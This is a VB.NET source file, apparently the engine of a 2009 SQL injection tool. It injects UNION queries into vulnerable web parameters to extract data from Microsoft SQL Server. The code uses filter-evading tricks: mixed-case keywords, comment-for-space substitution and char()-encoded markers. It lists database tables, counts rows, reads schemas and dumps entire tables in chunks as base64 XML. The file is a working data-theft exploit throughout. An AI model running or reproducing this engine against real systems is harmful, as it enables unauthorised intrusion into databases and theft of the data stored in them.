﻿'Author: Daniel Kachakil  (dani@kachakil.com)  Copyright 2009
Public Class SfxEngine
    Inherits BaseEngine

    Private Const TEST_MARKER As String = "FsqlX&TeSt"
    Private Const START_MARKER As String = "FsqlX-B"
    Private Const END_MARKER As String = "FsqlX-E"

    Private m_ResponseStartMarker As String
    Private m_ResponseEndMarker As String

    Private m_ResponseIsHtmlEncoded As Boolean
    Private m_ResponseCaseModifier As CaseModifier


    Private Const PART_MAX_SIZE As Integer = 2048000 'bytes
    Private Const PART_MAX_ROWS As Integer = 10000

    Public Event JobCompleted(ByVal sender As Object, ByVal e As DebugEventArgs)

    Private Enum CaseModifier
        Unchanged
        UpperCase
        LowerCase
    End Enum

    Public Sub New(ByVal httpSettings As HttpSettings)
        MyBase.New(httpSettings)
    End Sub

    Public Sub Initialize()
        Dim sqlTestStatement As String = String.Format(Me.HttpSettings.SqlUnionPattern, SqlCharConvert(TEST_MARKER))
        Dim result As String = Me.GetInjectionResponse(sqlTestStatement).Response
        InitializeResponseModifiers(result)
    End Sub

    Private Sub InitializeResponseModifiers(ByVal htmlResponseForTest As String)
        Dim originalMarker As String = TEST_MARKER
        Dim encodedMarker As String = Web.HttpUtility.HtmlEncode(TEST_MARKER)
        Dim currentMarker As String
        Dim responseMarker As String

        Dim startIndex As Integer = htmlResponseForTest.IndexOf(originalMarker, StringComparison.InvariantCultureIgnoreCase)
        If startIndex > 0 Then
            Me.m_ResponseIsHtmlEncoded = False
            currentMarker = originalMarker
            responseMarker = htmlResponseForTest.Substring(startIndex, originalMarker.Length)
        Else
            startIndex = htmlResponseForTest.IndexOf(encodedMarker, StringComparison.InvariantCultureIgnoreCase)
            If startIndex > 0 Then
                Me.m_ResponseIsHtmlEncoded = True
                currentMarker = encodedMarker
                responseMarker = htmlResponseForTest.Substring(startIndex, encodedMarker.Length)
            Else
                Throw New Exception("Initialization failed. You will need to check that the URL is valid and adjust the injection pattern. Check the debug log for more details.")
            End If
        End If

        If Me.m_ResponseIsHtmlEncoded Then
            Me.m_ResponseStartMarker = Web.HttpUtility.HtmlEncode(START_MARKER)
            Me.m_ResponseEndMarker = Web.HttpUtility.HtmlEncode(END_MARKER)

            Me.RaiseDebugEvent("WARNING: Responses are encoded to HTML by the server. Find another parameter without encoding to get better performance")
        Else
            Me.m_ResponseStartMarker = START_MARKER
            Me.m_ResponseEndMarker = END_MARKER
        End If

        If currentMarker = responseMarker Then
            Me.m_ResponseCaseModifier = CaseModifier.Unchanged
        ElseIf currentMarker.ToUpperInvariant = responseMarker Then
            Me.m_ResponseCaseModifier = CaseModifier.UpperCase
            Me.RaiseDebugEvent("WARNING: Responses are converted to upper case by the server")
        ElseIf currentMarker.ToLowerInvariant = responseMarker Then
            Me.m_ResponseCaseModifier = CaseModifier.LowerCase
            Me.RaiseDebugEvent("WARNING: Responses are converted to lower case by the server")
        End If

        Me.RaiseDebugEvent("Engine successfully initialized")
    End Sub

    Private Shared Function SqlCharConvert(ByVal input As String) As String
        Dim sb As New System.Text.StringBuilder
        For Each c As Char In input.ToCharArray
            sb.Append("char(" + Asc(c).ToString + ")+")
        Next
        sb.Remove(sb.Length - 1, 1)
        Return sb.ToString
    End Function


    Private Function ExtractData(ByVal sqlInnerQuery As String, ByVal isScalar As Boolean) As Object
        Dim sqlUnionStatement As String = String.Format(Me.HttpSettings.SqlUnionPattern, _
                SqlCharConvert(START_MARKER) + "+(" + sqlInnerQuery + ")+" + SqlCharConvert(END_MARKER))

        Dim result As String = Me.GetInjectionResponse(sqlUnionStatement).Response

        If result Is Nothing Then Return Nothing

        Dim startPos As Integer = result.IndexOf(Me.m_ResponseStartMarker, StringComparison.InvariantCultureIgnoreCase)
        Dim endPos As Integer = result.IndexOf(Me.m_ResponseEndMarker, StringComparison.InvariantCultureIgnoreCase)

        If startPos < 0 OrElse endPos < 0 Then
            Return Nothing
        End If

        Dim extractedData As String = result.Substring(startPos + Me.m_ResponseStartMarker.Length, endPos - startPos - Me.m_ResponseStartMarker.Length)

        If Me.m_ResponseIsHtmlEncoded Then
            extractedData = Web.HttpUtility.HtmlDecode(extractedData)
        End If

        If isScalar Then
            Return extractedData
        Else
            Return TableInfo.ParseDataTable(extractedData)
        End If
    End Function



    Public Function GetTablesInfo() As List(Of TableInfo)
        Dim tables As New List(Of TableInfo)

        Dim dt As DataTable = ExtractSmallTable("TaBLE_SCHEMa,TaBLE_NaME", "INFORMATIOn_SCHEMa.TaBLES/**/WHeRE/**/Table_Type=" + SqlCharConvert("BASE TABLE"))

        If dt IsNot Nothing Then
            For Each row As DataRow In dt.Rows
                Dim table As New TableInfo(row(0).ToString, row(1).ToString)
                tables.Add(table)
            Next
        End If

        tables.Sort(New Comparison(Of TableInfo)(Function(t1 As TableInfo, t2 As TableInfo) t1.Name.CompareTo(t2.Name)))

        Return tables
    End Function

    Private Function ExtractSmallTable(ByVal columns As String, ByVal tableAndCondition As String) As DataTable
        Dim data As Object = ExtractData("SeLECT/**/" + columns + "/**/FRoM/**/" + tableAndCondition + "/**/FoR/**/XmL/**/RaW,BiNARY/**/BaSE64", False)

        Return CType(data, DataTable)
    End Function

    Private Function ExtractRawXml(ByVal columns As String, ByVal table As String, ByVal fromCharPosition As Integer, ByVal stringLength As Integer, ByVal partitionColumn As String, ByVal fromRow As Integer, ByVal toRow As Integer) As String
        Dim injection As String = "SeLECT*FRoM"

        If String.IsNullOrEmpty(partitionColumn) OrElse (toRow - fromRow < 0) Then
            injection += " " + table
        Else
            injection += "(SeLECT/**/RoW_nUMBER()OvER(oRDER/**/bY[" + partitionColumn + "])N," + columns + _
                         "/**/FRoM/**/" + table + ")T/**/WHeRE/**/N>" + (fromRow - 1).ToString + "/**/aNd/**/N<=" + toRow.ToString
        End If
        injection += "/**/FoR/**/XmL/**/RaW,BiNARY/**/BaSE64"

        If stringLength > 0 Then
            injection = "SeLECT/**/SuBSTRiNG((" + injection + ")," + fromCharPosition.ToString + "," + stringLength.ToString + ")"
        End If

        Dim data As Object = ExtractData(injection, True)
        Return CStr(data)
    End Function

    Private Function ExtractRawXml(ByVal columns As String, ByVal table As String) As String
        Return ExtractRawXml(columns, table, 0, 0, "", 0, 0)
    End Function

    Private Function ExtractRawXml(ByVal columns As String, ByVal table As String, ByVal fromCharPosition As Integer, ByVal stringLength As Integer) As String
        Return ExtractRawXml(columns, table, fromCharPosition, stringLength, "", 0, 0)
    End Function

    Private Function ExtractRawXml(ByVal columns As String, ByVal table As String, ByVal partitionColumn As String, ByVal fromRow As Integer, ByVal toRow As Integer) As String
        Return ExtractRawXml(columns, table, 0, 0, partitionColumn, fromRow, toRow)
    End Function


    Private Function ExtractScalar(ByVal scalarQuery As String, ByVal table As String) As String
        Dim data As Object = ExtractData("SeLECT CoNVeRT(nVaRcHaR,(SeLECT/**/" + scalarQuery + "/**/FRoM/**/" + table + "))", True)

        Return CStr(data)
    End Function

    Private Function ExtractDataLength(ByVal columns As String, ByVal table As String) As Integer
        Dim data As Object = ExtractData("SeLECT CoNVeRT(nVaRcHaR,lEn((SeLECT/**/" + columns + "/**/FRoM/**/" + table + "/**/FoR/**/XmL/**/RaW,BiNARY/**/BaSE64)))", True)

        Return CInt(data)
    End Function





    Public Sub GetTableRowCount(ByVal table As TableInfo)
        Dim count As String = ExtractScalar("COUNT(*)", table.FullName)
        If String.IsNullOrEmpty(count) Then
            table.RowCount = -1
        Else
            table.RowCount = CInt(count)
        End If

        RaiseEvent JobCompleted(Me, New DebugEventArgs(table.RowCount.ToString + " rows found in table " + table.Name))
    End Sub

    Public Sub GetTableSize(ByVal table As TableInfo)
        table.TotalBytes = ExtractDataLength(table.GetSelectedColumnAliases, table.FullName)

        RaiseEvent JobCompleted(Me, New DebugEventArgs(table.RowCount.ToString + " bytes estimated for table " + table.Name))
    End Sub

    Public Sub GetTableSchema(ByVal table As TableInfo)
        table.RawXmlSchema = CStr(ExtractData("SeLECT/**/ToP/**/0*/**/FRoM/**/" + table.FullName + "/**/FoR/**/XmL/**/RaW,BiNARY/**/BaSE64,XmLSCHeMA", True))

        RaiseEvent JobCompleted(Me, New DebugEventArgs("Column schema extracted for table " + table.Name))
    End Sub


    Public Sub GetTableContent(ByVal table As TableInfo)
        Dim t As New Stopwatch
        t.Start()

        table.RawXmlData.Length = 0

        Dim partitionColumn As String = ""
        If table.Columns.Count > 0 Then partitionColumn = table.Columns(0).ColumnName

        Dim rowIndex As Integer = 1
        Dim responseLenght As Integer = 0
        Do
            responseLenght = -table.RawXmlData.Length
            Dim part As Integer = 0
            Dim innerResponseLenght As Integer = 0
            Do
                Me.RaiseDebugEvent("Extracting rows from " + rowIndex.ToString + " to " + (rowIndex + PART_MAX_ROWS).ToString + " of " + table.RowCount.ToString + _
                " (part " + (part + 1).ToString + ") from table " + table.Name + "...")

                innerResponseLenght = -table.RawXmlData.Length
                table.RawXmlData.Append(Me.ExtractRawXml(table.GetSelectedColumnAliases, table.FullName, part * PART_MAX_SIZE, PART_MAX_SIZE, partitionColumn, rowIndex, rowIndex + PART_MAX_ROWS - 1))
                innerResponseLenght += table.RawXmlData.Length

                part += 1
            Loop While innerResponseLenght >= PART_MAX_SIZE - 100
            'Next

            responseLenght += table.RawXmlData.Length
            rowIndex += PART_MAX_ROWS

            If String.IsNullOrEmpty(partitionColumn) Then Exit Do
            If table.RowCount <= 0 AndAlso responseLenght = 0 Then Exit Do
            If table.RowCount > 0 AndAlso rowIndex > table.RowCount Then Exit Do
        Loop

        t.Stop()

        RaiseEvent JobCompleted(Me, New DebugEventArgs("Finished extraction of table " + table.Name + " in " + CInt(t.ElapsedMilliseconds / 1000).ToString + " seconds"))
    End Sub


End Class
